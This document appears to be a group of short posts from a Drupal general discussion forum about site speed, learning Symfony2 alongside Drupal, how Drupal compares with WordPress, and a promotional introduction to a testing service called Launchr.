General discussion

I've been using Drupal for a year and love it. I'm nearly complete with a website and am excited to launch it. I haven't really had a big concern with using Drupal except for one thing. Is the drupal.org website any indication of how slow my site will be? Honestly, I'm pretty nervous about it. There are many many times I'm waiting more than two minutes for the drupal.org site to load, and I have a very fast internet connection. I expect my site to have many times the user volume and that kind of response time will kill my site instantly.

Drupal can be used to build almost any kind of website. However I, and possibly many other people - would like to learn also something else - to have more tools under our belt. It would be a waste of time to learn something that duplicates Drupal functionalities, however those are so wide, that it is hard to find anything more to learn ;) . I was considering maybe Symfony2, as it would synergize with Drupal 8, but have you any other suggestion? It should be something that would supplement Drupal in areas where its lacking.

I am basically a WordPress developer and never worked on drupal platform. can someone tell me what is the difference between these 2 applications ?? and which is better you prefer for a rapid website development??

Anyway, I would like to introduce you to Launchr with the hope of raising your interest in participating in our community program.

In short, Launchr was created to offer an easy way of testing, demonstrating and evaluating open source web applications.

Just starting with Drupal. I have designed a bunch of websites using Wordpress, but hate dealing with WP security pains. Also looking for more flexibility and scalability with Drupal. So far I have found Drupal quite easy, but not as intuitive as WP.
